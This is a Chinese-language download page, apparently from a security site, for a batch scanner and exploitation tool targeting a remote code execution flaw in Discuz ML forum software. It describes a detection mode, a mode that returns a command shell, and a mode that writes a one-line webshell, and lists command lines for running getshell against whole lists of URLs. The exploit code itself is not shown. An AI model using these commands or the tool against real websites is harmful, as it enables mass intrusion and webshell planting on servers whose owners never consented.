Discuz ML RCE 漏洞批量检测利用工具

华盟原创文章投稿奖励计划

Discuz ML RCE 漏洞批量检测利用工具


工具说明本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。使用时加上漏洞PHP页面如(forum.php,portal.php),直接写域名可能会重定向导致误报。
环境插件
python2.7

pip -r requirements.txt

使用方法

判断模式     python dzml.py -u "https://xx.xx.com/forum.php"
cmdshell模式   python dzml.py -u "https://xx.xx.com/forum.php" --cmdshell
getshell模式   python dzml.py -u "https://xx.xx.com/forum.php" --getshell
批量检测     python dzml.py -f urls.txt
批量getshell   python dzml.py -f urls.txt --getshell

文章来源:

https://github.com/theLSA/discuz-ml-rce.git

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/download/249109.html

发表评论